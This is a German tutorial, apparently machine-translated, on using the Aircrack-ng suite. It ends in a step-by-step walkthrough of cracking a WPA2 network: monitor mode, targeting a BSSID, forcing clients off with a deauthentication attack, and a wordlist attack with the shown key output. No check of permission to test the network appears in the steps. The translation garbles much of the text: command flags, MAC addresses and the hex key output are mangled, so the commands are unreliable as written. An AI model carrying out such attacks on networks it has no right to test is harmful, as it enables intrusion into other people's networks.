So verwenden Sie Aircrack-ng

How Use Aircrack Ng

Meistens denken die Leute nie an das Netzwerk, mit dem sie verbunden sind. Sie denken nie daran, wie sicher dieses Netzwerk ist und wie viel sie täglich mit ihren vertraulichen Daten riskieren. Sie können Schwachstellenprüfungen in Ihren WLAN-Netzwerken durchführen, indem Sie ein sehr leistungsstarkes Tool namens . verwenden Aircrack-ng und Wireshark. Wireshark wird verwendet, um die Netzwerkaktivität zu überwachen. Aircrack-ng ist eher ein aggressives Tool, mit dem Sie drahtlose Verbindungen hacken und ihnen Zugriff gewähren können. Als Eindringling zu denken war schon immer der sicherste Weg, sich vor einem Hack zu schützen. Sie können möglicherweise die genauen Aktionen nachvollziehen, die ein Eindringling unternimmt, um Zugriff auf Ihr System zu erhalten, indem Sie sich über Aircrack informieren. Sie können dann Compliance-Prüfungen auf Ihrem eigenen System durchführen, um sicherzustellen, dass es nicht unsicher ist.

Aircrack-ng ist ein vollständiger Software-Satz zum Testen der WLAN-Netzwerksicherheit. Es ist nicht nur ein einzelnes Werkzeug, sondern eine Sammlung von Werkzeugen, von denen jedes einen bestimmten Zweck erfüllt. Es kann an verschiedenen Bereichen der WLAN-Sicherheit gearbeitet werden, z. B. Überwachung des Access Points, Testen, Angriff auf das Netzwerk, Knacken des WLAN-Netzwerks und Testen. Das Hauptziel von Aircrack besteht darin, die Pakete abzufangen und die Hashes zu entschlüsseln, um die Passwörter zu knacken. Es unterstützt fast alle neuen drahtlosen Schnittstellen. Aircrack-ng ist eine verbesserte Version einer veralteten Tool-Suite Aircrack, ng bezieht sich auf die Neue Generation . Einige der großartigen Tools, die zusammenarbeiten, um eine größere Aufgabe zu erledigen.



Airmon:

Airmon-ng ist im aircrack-ng-Kit enthalten, das die Netzwerkschnittstellenkarte in den Monitormodus versetzt. Netzwerkkarten akzeptieren normalerweise nur Pakete, die für sie bestimmt sind, wie durch die MAC-Adresse der NIC definiert, aber mit airmon-ng werden auch alle drahtlosen Pakete akzeptiert, egal ob sie für sie bestimmt sind oder nicht. Sie sollten in der Lage sein, diese Pakete abzufangen, ohne sich mit dem Zugangspunkt zu verbinden oder sich mit ihm zu authentifizieren. Es wird verwendet, um den Status eines Access Points zu überprüfen, indem die Netzwerkschnittstelle in den Überwachungsmodus versetzt wird. Zuerst muss man die WLAN-Karten so konfigurieren, dass sie den Monitormodus einschalten, und dann alle Hintergrundprozesse beenden, wenn Sie der Meinung sind, dass ein Prozess ihn stört. Nach dem Beenden der Prozesse kann der Monitormodus auf der drahtlosen Schnittstelle durch Ausführen des folgenden Befehls aktiviert werden:



[email protected] :~$sudoairmon-ng start wlan0#

Sie können den Überwachungsmodus auch deaktivieren, indem Sie airmon-ng jederzeit mit dem folgenden Befehl stoppen:

[email protected] :~$sudoairmon-ng stop wlan0#

Luftleitblech:

Airodump-ng wird verwendet, um alle Netzwerke um uns herum aufzulisten und wertvolle Informationen darüber anzuzeigen. Die grundlegende Funktionalität von airodump-ng besteht darin, Pakete zu schnüffeln, daher ist es im Wesentlichen so programmiert, dass es alle Pakete um uns herum erfasst, während es in den Überwachungsmodus versetzt wird. Wir führen es gegen alle Verbindungen um uns herum aus und sammeln Daten wie die Anzahl der mit dem Netzwerk verbundenen Clients, ihre entsprechenden Mac-Adressen, den Verschlüsselungsstil und die Kanalnamen und fangen dann an, unser Zielnetzwerk ins Visier zu nehmen.

Durch Eingabe des Befehls airodump-ng und Angabe des Netzwerkschnittstellennamens als Parameter können wir dieses Tool aktivieren. Es listet alle Zugangspunkte, die Menge der Datenpakete, die verwendeten Verschlüsselungs- und Authentifizierungsmethoden sowie den Namen des Netzwerks (ESSID) auf. Aus Hacking-Sicht sind die Mac-Adressen die wichtigsten Felder.

[email protected] :~$sudoairodump-ng wlx0mon

Luftriss:

Aircrack wird zum Knacken von Passwörtern verwendet. Nachdem wir alle Pakete mit Airodump erfasst haben, können wir den Schlüssel per Aircrack knacken. Es knackt diese Schlüssel mit zwei Methoden PTW und FMS. Der PTW-Ansatz erfolgt in zwei Phasen. Zunächst werden nur die ARP-Pakete verwendet und erst dann, wenn der Schlüssel nach der Suche nicht geknackt wird, alle anderen erfassten Pakete. Ein Pluspunkt des PTW-Ansatzes ist, dass nicht alle Pakete zum Knacken verwendet werden. Im zweiten Ansatz, also FMS, verwenden wir sowohl die statistischen Modelle als auch die Brute-Force-Algorithmen zum Knacken des Schlüssels. Es kann auch ein Wörterbuchverfahren verwendet werden.

Aireplay:

Airplay-ng führt Pakete in ein drahtloses Netzwerk ein, um Datenverkehr zu erzeugen oder zu beschleunigen. Pakete aus zwei verschiedenen Quellen können von aireplay-ng erfasst werden. Das erste ist das Live-Netzwerk und das zweite sind die Pakete aus der bereits existierenden pcap-Datei. Airplay-ng ist während eines Deauthentifizierungsangriffs nützlich, der auf einen drahtlosen Zugangspunkt und einen Benutzer abzielt. Darüber hinaus können Sie einige Angriffe wie einen Kaffee-Latte-Angriff mit Airplay-ng ausführen, einem Tool, mit dem Sie einen Schlüssel vom System des Clients abrufen können. Sie können dies erreichen, indem Sie ein ARP-Paket abfangen und dann manipulieren und an das System zurücksenden. Der Client erstellt dann ein Paket, das von airodump erfasst werden kann und aircrack knackt den Schlüssel dieses modifizierten Pakets. Einige andere Angriffsoptionen von Airplay-ng sind Chopchop, Fragment Arepreplay usw.

Luftstützpunkt:

Airbase-ng wird verwendet, um den Computer eines Eindringlings in einen kompromittierten Verbindungspunkt zu verwandeln, mit dem sich andere verbinden können. Mit Airbase-ng können Sie sich als legaler Zugangspunkt ausgeben und Man-in-the-Middle-Angriffe auf Computer durchführen, die mit Ihrem Netzwerk verbunden sind. Diese Arten von Angriffen werden als böse Zwillingsangriffe bezeichnet. Für einfache Benutzer ist es unmöglich, zwischen einem legalen Zugangspunkt und einem gefälschten Zugangspunkt zu unterscheiden. Die Bedrohung durch den bösen Zwilling gehört also zu den bedrohlichsten drahtlosen Bedrohungen, denen wir heute ausgesetzt sind.

Airolib-ng:

Airolib beschleunigt den Hacking-Prozess, indem es die Passwortlisten und den Zugangspunkt speichert und verwaltet. Das von diesem Programm verwendete Datenbankverwaltungssystem ist SQLite3, das größtenteils auf allen Plattformen verfügbar ist. Das Knacken von Passwörtern umfasst die Berechnung des paarweisen Hauptschlüssels, durch den der private vorübergehende Schlüssel (PTK) extrahiert wird. Mit dem PTK können Sie den Frame Message Identification Code (MIC) für ein gegebenes Paket bestimmen und theoretisch feststellen, dass der MIC dem Paket ähnlich ist. Wenn also der PTK richtig war, war auch der PMK richtig.

Geben Sie den folgenden Befehl ein, um die in der Datenbank gespeicherten Kennwortlisten und Zugriffsnetzwerke anzuzeigen:

[email protected] :~$sudoairolib-ng testdatabase –stats

Hier ist testdatabase die Datenbank, auf die Sie zugreifen oder die Sie erstellen möchten, und –stats ist die Operation, die Sie damit ausführen möchten. Sie können mehrere Operationen an den Datenbankfeldern durchführen, wie z. B. einer SSID die maximale Priorität zu geben oder so. Um airolib-ng mit aircrack-ng zu verwenden, geben Sie den folgenden Befehl ein:

[email protected] :~$sudoaircrack-ng-RTestdatenbank wpa2.eapol.cap

Hier verwenden wir die bereits berechneten PMKs, die im gespeichert sind Testdatenbank zur Beschleunigung des Passwort-Cracking-Prozesses.

Knacken von WPA/WPA2 mit Aircrack-ng:

Schauen wir uns ein kleines Beispiel an, was aircrack-ng mit Hilfe einiger seiner großartigen Tools tun kann. Wir werden den Pre-Shared Key eines WPA/WPA2-Netzwerks mit einer Wörterbuchmethode knacken.

Als erstes müssen wir Netzwerkschnittstellen auflisten, die den Monitormodus unterstützen. Dies kann mit dem folgenden Befehl erfolgen:

[email protected] :~$sudoairmon-ng

PHY-Schnittstellentreiber-Chipsatz

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Wir können eine Schnittstelle sehen; Jetzt müssen wir die gefundene Netzwerkschnittstelle ( wlx0 ) mit dem folgenden Befehl in den Monitormodus versetzen:

[email protected] :~$sudoairmon-ng start wlx0

Es hat den Monitormodus auf der Schnittstelle namens . aktiviert wlx0mon .

Jetzt sollten wir über unsere Netzwerkschnittstelle, die wir in den Monitormodus versetzt haben, damit beginnen, Übertragungen von Routern in der Nähe zu hören.

[email protected] :~$sudoairodump-ng wlx0mon

CH5 ][Verstrichen:30S][ 2020-12-02 00:17



BSSID PWR Beacons#Daten, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Vier fünf 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9:84:76:10:SEIN-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:GIBT:88:FA:38: 02-68 28 2 0 elf54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C:3A:Vier fünf: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91:B5:F8:7E:D5 -390e-1 1002 13

Unser Zielnetzwerk ist Knacken in diesem Fall der gerade auf Kanal 1 läuft.

Um das Passwort des Zielnetzwerks zu knacken, müssen wir hier einen 4-Wege-Handshake erfassen, der passiert, wenn ein Gerät versucht, eine Verbindung zu einem Netzwerk herzustellen. Wir können es mit dem folgenden Befehl erfassen:

[email protected] :~$sudoairodump-ng-C 1--bssid E4: 6F:13: 04: CE:31 -in /Zuhause wlx0

-C : Kanal

–Bss : Bssid des Zielnetzwerks

-in : Der Name des Verzeichnisses, in dem die pcap-Datei abgelegt wird

Jetzt müssen wir warten, bis sich ein Gerät mit dem Netzwerk verbindet, aber es gibt eine bessere Möglichkeit, einen Handshake zu erfassen. Wir können die Geräte mit einem Deauthentifizierungsangriff mit dem folgenden Befehl beim AP deauthentifizieren:

[email protected] :~$sudoaireplay-ng-0 -zuE4: 6F:13: 04: CE:31

zu : Bssid des Zielnetzwerks

-0 : Deauthentifizierungsangriff

Wir haben alle Geräte getrennt und müssen nun warten, bis sich ein Gerät mit dem Netzwerk verbindet.

CH1 ][Verstrichen:30S][ 2020-12-02 00:02][WPA-Handshake: E4: 6F:13: 04: CE:31



BSSID PWR RXQ Beacons#Daten, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31BC:91:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C:3A:Vier fünf: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27:7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -350e- 6e263 708Knacken

E4: 6F:13: 04: CE:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -37 0- 1e0 1

Wir haben einen Treffer bekommen, und wenn wir in die obere rechte Ecke rechts neben der Uhrzeit schauen, können wir sehen, dass ein Handschlag erfasst wurde. Suchen Sie nun in dem angegebenen Ordner ( /Heimat in unserem Fall) für a .pcap Datei.

Um den WPA-Schlüssel zu knacken, können wir den folgenden Befehl verwenden:

[email protected] :~$sudoaircrack-ng-a2 -inrockyou.txt-BE4: 6F:13: 04: CE:31handshake.cap

b :Bssid des Zielnetzwerks

-a2: WPA2-Modus

Rockyou.txt: Das WörterbuchDateiGebraucht

Handshake.cap: DieDatei welcherenthält erfassten Handschlag

Aircrack-ng1,2Beta3

[00:01:49] 10566Schlüssel getestet(1017,96zu/S)

SCHLÜSSEL GEFUNDEN! [Du hast mich]

Hauptschlüssel: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FfünfzigC


Transienter Schlüssel: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FfünfzigC025 62E9 5D71

Der Schlüssel zu unserem Zielnetzwerk wurde erfolgreich geknackt.

Abschluss:

Drahtlose Netzwerke sind überall und werden von jedem Unternehmen verwendet, von Arbeitern, die Smartphones verwenden, bis hin zu industriellen Steuerungsgeräten. Laut Untersuchungen werden 2021 fast über 50 Prozent des Internetverkehrs über WLAN abgewickelt. Drahtlose Netzwerke haben viele Vorteile, Kommunikation vor Türen, schneller Internetzugang an Orten, an denen es kaum möglich ist, Kabel zu verlegen, kann das Netzwerk ohne Verlegen von Kabeln erweitern für jeden anderen Benutzer und können Ihre mobilen Geräte ganz einfach mit Ihrem Home-Office verbinden, wenn Sie nicht da sind.

Trotz dieser Vorteile gibt es ein großes Fragezeichen in Bezug auf Ihre Privatsphäre und Sicherheit. Da diese Netzwerke; im Sendebereich von Routern sind für jedermann zugänglich, leicht angreifbar und Ihre Daten können leicht kompromittiert werden. Wenn Sie beispielsweise mit einem öffentlichen WLAN verbunden sind, kann jeder, der mit diesem Netzwerk verbunden ist, Ihren Netzwerkverkehr mit etwas Intelligenz und mithilfe der verfügbaren großartigen Tools leicht überprüfen und sogar ausgeben.